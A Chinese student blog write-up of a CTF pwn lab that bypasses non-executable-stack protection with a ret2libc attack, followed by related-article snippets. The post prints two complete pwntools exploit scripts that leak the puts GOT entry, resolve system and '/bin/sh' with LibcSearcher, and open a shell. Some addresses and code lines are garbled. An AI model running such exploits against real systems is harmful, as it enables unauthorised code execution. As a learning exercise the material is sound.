菜鸟实验三

最新推荐文章于 2022-09-06 16:43:19 发布
最新推荐文章于 2022-09-06 16:43:19 发布
阅读量298 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kdxxixi/article/details/89461011
版权

实验原理与目的

此次的实验稍微加大了难度,不过可难不倒我这个小机灵鬼。专业大神较多,多问多学最终还是做了出来,继续鼓励我吧!!!这次实验如果不能直接找到system和bin/sh的话,上次实验的方法就行不通了。我们这次需要绕过保护,本次实验就是通过泄露某个libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令,最终才能getshell。

实验步骤

1、参考互联网上的博客咯!具体地址在https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3
运用例三的步骤,先检查文件的保护。
![Alt](https://avatar.csdn.net/7/7/B/1_ralf_hx163com.jpg#pic_center在这里插入图片描述
可以看出,源程序仍旧开启了堆栈不可执行保护。进而查看源码,发现程序的 bug 仍然是栈溢出
2、那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点,system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。
即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。而 libc 在 github 上有人进行收集,如下
https://github.com/niklasb/libc-database
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。进而我们就可以知道 system 函数的地址。
那么如何得到 libc 中的某个函数的地址呢?我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。当然,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。
我们自然可以根据上面的步骤先得到 libc,之后在程序中查询偏移,然后再次获取 system 地址,但这样手工操作次数太多,有点麻烦,这里给出一个 libc 的利用工具,具体细节请参考 readme
https://github.com/lieanu/LibcSearcher
此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。
这里我们泄露 __libc_start_main 的地址,这是因为它是程序最初被执行的地方。基本利用思路如下
泄露 __libc_start_main 地址
获取 libc 版本
获取 system 地址与 /bin/sh 的地址
再次执行源程序
触发栈溢出执行 system(‘/bin/sh’)
查看源码记下主函数地址0x080484FD
3、来看一下脚本
from LibcSearcher import *
from pwn import *
context.log_level=‘debug’
context.terminal=[‘gnome-terminal’,’-x’,‘sh’,’-c’]
p=process(’./pwn’)
elf= ELF(’./pwn’)
main=0x080484FD
payload=‘a’(0x6c+4)+p32(elf.plt[‘puts’])+p32(main)+p32(elf.got[‘puts’])
p.recv()
p.sendline(payload)
puts=u32(p.recv(4))
print(‘puts’,hex(puts))
p.interactive()
运行结果

然后计算偏移量来得到通过计算偏移量来得到system和bin_sh的地址
在这里插入图片描述
得到system和bin_sh的实际地址
system为0xfd88200
binsh为0xf7ec9Dcf
4、现在我们继续调试,程序再次执行main函数,所以需要再构造一个payload,将system与bin_sh的地址加在ROP链中,此时栈的状态发生了改变,需要重新计算一下需要填充的字符数,payload构造为payload=‘a’(0x64+4)+p32(system)+p32(0x61616161)+p32(bin_sh)
from LibcSearcher import *
from pwn import *
context.log_level=‘debug’
context.terminal=[‘gnome-terminal’,’-x’,‘sh’,’-c’]

p=process(’./pwn’)
elf= ELF(’./pwn’)
main=0x080484FD
payload=‘a’(0x6c+4)+p32(elf.plt[‘puts’])+p32(main)+p32(elf.got[‘puts’])
p.recv()
p.sendline(payload)
puts=u32(p.recv(4))
print(‘puts’,hex(puts))
libc =LibcSearcher(‘puts’,puts)
libcbase=puts-libc.dump(‘puts’)
system=libcbase+libc.dump(‘system’)
bin_sh=libcbase+libc.dump(‘str_bin_sh’)
print(‘system’,hex(system))
print(‘binsh’,hex(bin_sh))
payload=‘a’(0x64+4)+p32(system)+p32(0xdeadbeef)+p32(bin_sh)
p.sendline(payload)
p.interactive()
看一下执行后的效果
在这里插入图片描述

总结

这次实验有点难呀,配置环境也不会配还是别人教我的。然后呢在泄露libc时也屡次出现错误,我要加油了,要不然又要拖专业的后腿了。

kdxxixi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pwn入门之ELF文件
m0_49666584的博客
09-28 2080
ELF文件为Linux下的可执行文件,对标Windows下的PE文件(而非exe,具体可自行查阅资料了解),我们做pwn的题目需要了解其中的ELF头,Section(节),Segment(段)即可。 ELF文件头主要包含了程序运行的计算机框架,程序入口等信息。在Linux终端我们可以使用"readelf -h"读取相应的内容。 ELF文件由多个节(有时也称段)构成,其中存放着各种数据,不同的数据在不同的区域,而且赋予使用者的权限也不相同。 ...
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7365
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
[ctfhub.pwn] 第12-14题
weixin_52640415的博客
09-06 658
ctfhub.pwn习题集
Canary学习(爆破Canary)
至臻求学,胸怀云月
01-30 3722
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
ELF文件解析和加载(附代码)
热门推荐
珂珂可爱多
03-20 4万+
目录:1. elf文件基本概念2. elf文件结构3. elf文件装载4. 代码实现1.elf文件基本概念elf文件是一种目标文件格式,用于定义不同类型目标文件以什么样的格式,都放了些什么东西。主要 用于linux平台。windows下是PE/COFF格式。 可执行文件、可重定位文件(.o)、共享目标文件(.so)、核心转储文件都是以elf文件格式存...
菜鸟学习JavaScript小实验之函数引用
12-02
代码如下: function tt() { alert(11); } var b = tt; var b1 = tt(); //执行tt()函数功能 对于函数的引用,可直接将函数名“tt”赋给变量,但不可以是函数名+括号的形式“tt()”,因为第二种是直接执行该...
CCNP 实验手册 用于ccnp菜鸟实验
09-21
CCNP 实验手册 用于ccnp菜鸟实验
nooblab菜鸟实验室出品基于fis3的eslint自动检测插件
08-12
noob lab(菜鸟实验室)出品,基于fis3的eslint自动检测插件
mysql数据库实验报告 数据表的操作
07-27
MySQL数据库的创建、查看、删除、使用命令。 表结构创建和修改、表约束的创建和修改; 表数据的插入、删除和修改; 表联系的创建和修改。
安装LibcSearcher的方法
neuisf的博客
01-04 1万+
在练习Pwn过程中,要用到python的一个库,叫做LibcSearcher,安装方法如下: 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py install 4.直接运行python exp.py会提示“No module named LibcSearche...
exp编写小技巧
m0_49959202的博客
08-14 805
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload exp编写小技巧 1.代码对齐 exp中填写地址时要注意代码长度的填充 2. 填充为指定长度 3. 链接远程服务器或者链接本地文件 # 远程 r = rem
64位下pwntools中dynELF函数的使用
weixin_30362233的博客
12-07 373
这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法 编译好的程序http://pan.baidu.com/s/1jImF95O 源码在后面 from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + ...
pwntools中DynELF使用
weixin_41038905的博客
04-19 853
DynELF是pwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
Pwn-高阶ROP-[栈溢出]/篇3
m0_52343643的博客
05-11 1310
大概调用过程: 也就是我们这里先调用了write函数的plt表项触发了_dl_runtime_resolve函数(会push linkmap)之后会先到.rel.plt段,通过plt中给的push <偏移>在.rel.plt段中找到偏移处对应函数的重定位表项,再通过该表项的r_info(一个偏移量),找到.dynsym段中对应偏移量函数的符号表项,又通过该符号表项的st_name(也是一个偏移量)在.dynstr段找到对应的字符串,最后就会通过这个字符串(函数名)来调用该函数。
LibcSearcher的安装使用
qq_40026795的博客
06-26 1万+
LibcSearcher是针对pwn做的python库,在做pwn题时寻找libc版本非常好用,使用方式也非常简单: fromLibcSearcherimport* #第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型 obj=LibcSearcher("fgets",0X7ff39014bd90) 可以安装也可以直接将LibcSearcher.py拿到...
PWN入门之libc表
weixin_44681716的博客
03-24 2673
这次的实验的前提的我们不知道system和bin/sh的函数,然后通过泄露某个函数在libc表中的地址,再加上这几个函数的偏移量来计算system和bin/sh的地址,最后将这个地址覆盖到ret上,以便能跳至我们想要的函数,最终获得shellcode 我们还是以pwn举例 1、 ...
通过给的libc泄露函数地址
zszcr的博客
03-22 5462
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
buuctf ctf (第5.5波)学会使用LibcSearcher
月阴荒的博客
04-22 1410
jarvisoj_level3 https://blog.csdn.net/qinying001/article/details/104473597 jarvisoj_level3_x64 https://blog.csdn.net/qinying001/article/details/104473597 [HarekazeCTF2019]baby_rop2 同样需要注意这道题的flag不在当前目...
LibcSearcher 安装 错误处理
L0g1c的博客
05-02 1449
LibcSearcher 安装 错误处理 第一步 :安装 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py develop 报错一 Traceback (most recent call last): File "setup.py", line 1, in <module> from setuptools import find_packages, s
python语音对话实验菜鸟教程
最新发布
06-10
您好!关于Python语音对话实验,您可以参考以下菜鸟教程: 1. PyAudio库的安装和使用:https://www.runoob.com/w3cnote/python-pyaudio-module.html 2. SpeechRecognition库的安装和使用:https://www.runoob.com/w3cnote/python-speechrecognition-module.html 3. 使用百度语音API进行语音识别和语音合成:https://www.runoob.com/w3cnote/python-baidu-voice-api.html 希望对您有所帮助!如果您有其他问题,欢迎继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值